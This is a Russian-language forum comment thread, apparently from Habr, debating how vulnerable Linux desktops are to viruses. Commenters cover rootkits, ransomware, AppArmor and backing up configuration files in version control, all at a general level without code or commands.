                                                                                                                            Напишите вирус который под линуксом не будет обнаружен и прибит в течении 5 минут, будет самостоятельно массово распространяться и делать что-то полезное (спам например рассылать или на пользователя палоьцы кидать) — тогда и поговорим.

                                                                                                                            Ах да, и чтобы к этому вирусу небыло ридми на несколько страниц с рассказом о том как им правильно заразиться.
                                                                                                                            • 0
                                                                                                                              есть такие вирусы, которые после получения рута (да, в линухе тоже проскакивают такие дырки) становятся прослойкой
                                                                                                                              между ядром и пользователем — возможность полного контроля ВСЕГО. А самое страшное — что обнаружить их крайне сложно. (про стандартные средства типа ps ax можете забыть). Если не достаточно продуманний — есть шанс установить его по количеству трафика выходного. (к-во выходного — к-во входящего на шлюзе).

                                                                                                                              Паранойя местами помогает )
                                                                                                                              • 0
                                                                                                                                Прикатит с обновлением новое ядро или любой важный компонент и гудбай вирус.
                                                                                                                                • +1
                                                                                                                                  Вы правда верите что _МАССОВЫЕ_ эпидемии вирусов эксплатирующих подобные уязвимости возможны?

                                                                                                                                  Такие «подарки» появляются достаточно редко и латаются очень оперативно. Обычно дырки очень специфичны и ограничены кучей дополнительных условий, по этому подходят лишь для целенаправленного квалифицированного взлома.

                                                                                                                                  Последняя массовая дыра в линуксе которую я помню — это дефолтные пароли «admin/admin» на домашних маршрутизаторах, но это все равно что жаловаться на ненадёжность стальной двери не запирая её при этом.
                                                                                                                                  • +1
                                                                                                                                    Где они такие есть? Пруф пожалуйста.
                                                                                                                              • 0
                                                                                                                                а вот это у них надо спросить. пишут вирусы just for fun видите-ли.
                                                                                                                                под винду же пишут.
                                                                                                                                • 0
                                                                                                                                  В последнее время мне встречались вирусы которые тупо трут пользовательские данные. Может кинети линки на описание хотябы парочки, которые появились за последний год?

                                                                                                                                  Насколько я знаю львиная доля вирусов — это трояны для создания ботнетов или блокирующие экраны с требованием отправить СМС.

                                                                                                                                  И то и другое под линуксом удалить на ап-чхи! Да и не совсем понятны пути проникновения (массового)
                                                                                                                                • 0
                                                                                                                                  Ну ок, не сотрет а зашифрует домашнюю директорию и попросит отправить СМС… Это уже проблема и прибивать такой вирус толку особо нет
                                                                                                                                  • 0
                                                                                                                                    Знаете, без палева зашифровать энное количество гигабайт информации — это умудриться надо.

                                                                                                                                    Т.к. без рута невозможно дать прозрачный доступ к зашифрованным данным, чтобы они выглядели как не зашифрованные (пока вирус работает)

                                                                                                                                    Увы и ах…
                                                                                                                              • 0
                                                                                                                                А на счет бизнеса — выше красивый баннер нарисовали — угроза то вполне реальной может быть.
                                                                                                                          • +2
                                                                                                                            Тупые домохозяйки как поставят Kaspersky Anti-Virus for Linux Workstations и будет им счастье, если у них нет ума что бы понять что можно запускать, а что нельзя — пусть за них это делает антивирус.
                                                                                                                            • 0
                                                                                                                              Собственно, создание подобного продукта и есть логичное решение проблемы.
                                                                                                                              • +1
                                                                                                                                Ну продукт давно создан и даже неплохо продается, к лету будет новая версия, так что все в порядке!
                                                                                                                                Come into the Green Zone. ;-)
                                                                                                                            • +1
                                                                                                                              Хорошей практикой является хранение своих конфигов в SVN или любой другой системе контроля версий с коммитами по крону. При этом репо не в пользовательской среде, а, желательно, вообще на удаленном серве. Но такое позволить себе могут далеко не все, да и проблема лени (у самого никак руки не дойдут). При этом можно гораздо проще видеть что было нагаженно в конфигах и элементарно откатить. Не говоря уже о восстановлении системы после переустановки / упрощенный перенос конфигов на другой комп.
                                                                                                                              • 0
                                                                                                                                давно изобрели github и bitbucket, у второго даже бесплатный план есть. это может позволить себе кто угодно, даже я!
                                                                                                                                • 0
                                                                                                                                  бесплатный план везде есть.
                                                                                                                                  а на Launchpad еще можно создавать ветки вне проектов, для себя.
                                                                                                                                  • +1
                                                                                                                                    бесплатный и приватный?
                                                                                                                                    • 0
                                                                                                                                      *links *free *git на хабре подсказали бесплатный приватный хостинг git и svn. С багтрекером и прочими блекджеками. unfuddle.com
                                                                                                                                      juick.com/157321
                                                                                                                                      • 0
                                                                                                                                        о, спасибо. другой вопрос, меркуриал такой красивый под виндой в сравнении с гитом, что я даже из под линукса его использую :)
                                                                                                                                      • 0
                                                                                                                                        1)зачем приватный? конфиги публиковать надо.
                                                                                                                                        2)где на BitBucket приватный?
                                                                                                                                        3)зачем все это, если есть Dropbox?
                                                                                                                                        • 0
                                                                                                                                          1. зачем их светить-то всем? может у меня среди скриптов начальных порнуха качается, а я не хочу адресов сайтов палить
                                                                                                                                          2. зайди да посмотри, приватный репозиторий дается тебе бесплатно
                                                                                                                                          3. дропбокс не хранит историю или платный
                                                                                                                                          • 0
                                                                                                                                            1. ну не все конфиги вообще бекапить нужно. Emacs'овые вполне себе публикуют.
                                                                                                                                            2. да, точно, есть.
                                                                                                                                            3. историю хранит бесплатно, но не особо с ней управляется.
                                                                                                                                            Однако, что мешает сделать bzr init в ~/Dropbox/configs и делать локальные коммиты? Самое лучшее решение.
                                                                                                                                • –7
                                                                                                                                  image
                                                                                                                                  • +3
                                                                                                                                    что это?
                                                                                                                                    ЗЫ только не говорите что это водопад :D
                                                                                                                                    • +1
                                                                                                                                      Я как бы намекаю на скринсейвер-троян, о котором тут писали. И на то, что рассматривать человеческий фактор при сравнении операционок — глупо.
                                                                                                                                  • +3
                                                                                                                                    Linux — ничуть не безопаснее в некоторых аспектах, чем другие системы.

                                                                                                                                    Вот Вы так долго расписывали о том куда и как можно пролезть и как удалить, а всё это(как уже написали несколько раз) прекрасно блокируется при помощи AppArmor который просто не даст FF писать куда либо кроме папки download и установлен в любом современном дистрибутиве, советую почитать например https://help.ubuntu.com/community/AppArmor, и увидеть что профиль для FF включается ровно 1 командой, и если угроза станет действительно реальной, то профиль включат по умолчанию.

                                                                                                                                    А ещё стоит не забывать что очень скоро самым популярным десктопным линуксом вполне может стать гугло-ось, в которой и цифровые подписи на всё что можно, и хром.
                                                                                                                                    • –2
                                                                                                                                      А ещё стоит не забывать что очень скоро самым популярным десктопным линуксом вполне может стать гугло-ось, в которой и цифровые подписи на всё что можно, и хром.

                                                                                                                                      Не драматизируйте.
                                                                                                                                    • +1
                                                                                                                                      Суть поста не ясна:) Да! под линукс можно писать вирусы, но чего боятся то??? Здесь все дело в уровне знаний пользователей, из которых словить вирус могут только новички или «мамочки которых пересадили на убунту» с новичками все понятно, со временем разберутся, а с «мамочками все еще проще» не знает пароля — не сможет установить вирус:)
                                                                                                                                      • 0
                                                                                                                                        «Уровень знаний» — это миф, и весьма вредный миф. Чтобы обезопасить дом, мы ставим во всех дверях надёжные замки, а не оставляем пустые дверные проёмы со словами «уровень знаний защитит». Винда — это отличный пример наступания на грабли безопасности, и этими ошибками нужно пользоваться, чтобы предупредить их на линус-системах. Я не вижу никаких потенциальных препятствий для реализации защиты «от дурака», в винде это невозможно по историческим и архитектурным причинам, однако в линуксах всё ещё впереди и можно, а даже нужно такое реализовывать. Контроль целостности пользовательских файлов — это именно защита от дурака. Первый и главный рубеж обороны, который способен отсечь огромное количество вредоносного кода сразу.
                                                                                                                                        • 0
                                                                                                                                          Я с вами не совсем согласен, на самом деле уровень знаний весьма и весьма полезен, вот только у меня нет желания объяснять почему, сравнение с виндой по моему лишнее. А защита от дурака на мой взгляд реализована в линуксе на высоте, все что для этого нужно сделать — не говорить дурокам пароль, и никакой вирус уже не сможет ничего модифицировать.
                                                                                                                                          • 0
                                                                                                                                            Я и не говорил, что уровень знаний бесполезен. Я говорил, что он излишне мифологизирован. И у многих пользователей он явно недостаточен, но это вовсе не значит, что этих пользователей нужно посылать куда подальше.

                                                                                                                                            > А защита от дурака на мой взгляд реализована в линуксе на высоте, все что для этого нужно сделать — не говорить дурокам пароль, и никакой вирус уже не сможет ничего модифицировать.

                                                                                                                                            Так я и привёл примеры, показывающие, что никакой защиты от дурака нет. Во многом защита основана на том, что у пользователя нет прав писать в системные файлы. Но в остальном — те же проблемы, что и в винде, плюс чуток специфичных для линукса.
                                                                                                                                        • +2
                                                                                                                                          Если операционная система станет действительно популярной, то уровень компьютерной грамотности среднего пользователя резко снизится. И это нужно иметь ввиду.